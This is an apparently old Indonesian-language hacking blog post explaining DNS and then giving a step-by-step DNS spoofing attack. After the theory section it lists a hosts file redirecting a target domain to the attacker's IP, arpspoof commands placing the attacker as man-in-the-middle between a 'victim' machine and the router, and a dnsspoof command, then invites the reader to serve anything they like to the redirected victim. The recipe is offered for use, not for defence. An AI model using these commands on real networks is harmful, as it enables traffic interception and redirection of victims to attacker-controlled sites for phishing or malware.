Pages

Sunday, March 06, 2011

simple DNS spoof (no ettercap) :p

Dasar Teori

Sebelum dipergunakannya DNS, jaringan komputer menggunakan HOSTS files yang berisi informasi dari nama komputer dan IP address-nya.
Di Internet, file ini dikelola secara terpusat dan di setiap lokasi harus di copy versi terbaru dari HOSTS files,
dari sini bisa dibayangkan betapa repotnya jika ada penambahan 1 komputer di jaringan,
maka kita harus copy versi terbaru file ini ke setiap lokasi. Dengan makin meluasnya jaringan internet,
hal ini makin merepotkan, akhirnya dibuatkan sebuah solusi dimana DNS di desain menggantikan fungsi HOSTS files,
dengan kelebihan unlimited database size, dan performace yang baik.
DNS adalah sebuah aplikasi services di Internet yang menerjemahkan sebuah domain name ke IP address.
Sebagai contoh, www untuk penggunaan di Internet, lalu diketikan nama domain, misalnya: yahoo.com
maka akan di petakan ke sebuah IP mis 202.68.0.134. Jadi DNS dapat di analogikan pada pemakaian buku telepon,
dimana orang yang kita kenal berdasarkan nama untuk menghubunginya kita harus memutar nomor telepon di pesawat telepon.
Sama persis, host computer mengirimkan queries berupa nama komputer dan domain name server ke DNS, lalu oleh DNS dipetakan ke IP address.

sekarang mari kita coba mengulang kembali sejarah yang telah lalu..:)
pertama yang perlu anda siap kan adalah alat bantu..:p

# arpspoof
# dnsspoof

selanjutnya buat file host.txt ( seperti jaman dahulu kala sajha)

isi file host.txt :

192.168.1.100 www.ihir.com
192.168.1.100 *.ihir.com
192.168.1.100 www.ihir.*


192.168.1.100 : IP adress anda
www. ihir.com : website yang akan anda spoof

selanjutnya berubah menjadi sniffer...:p (man in the middle)

$ arpspoof -i eth0 -t 192.168.1.102 192.168.1.1
$ arpspoof -i eth0 -t 192.168.1.1 192.168.1.102

dimana IP
192.168.1.102 = victim
192.168.1.1 = router

jangan lupa menjalankan webserver kesayangan anda.,.:D
next tinggal spoofing sajha...:)

dnsspoof -i eth0 -f host.txt


kalo tidak ada kesalahan maka permintaan dari victim ke ihir.com
akan segera di alihkan ke webserver lokal anda...:)

terserah dach.,.mau di pasang apa di localhostnya...;)

sekian dulu y...semoga tulisan yang sederhana ini bisa bermanfaat utk sahabat-sahabat..AMIN..


regards : yur4kh4

tested on : dEviRakhjib OS,,heee....:lolz: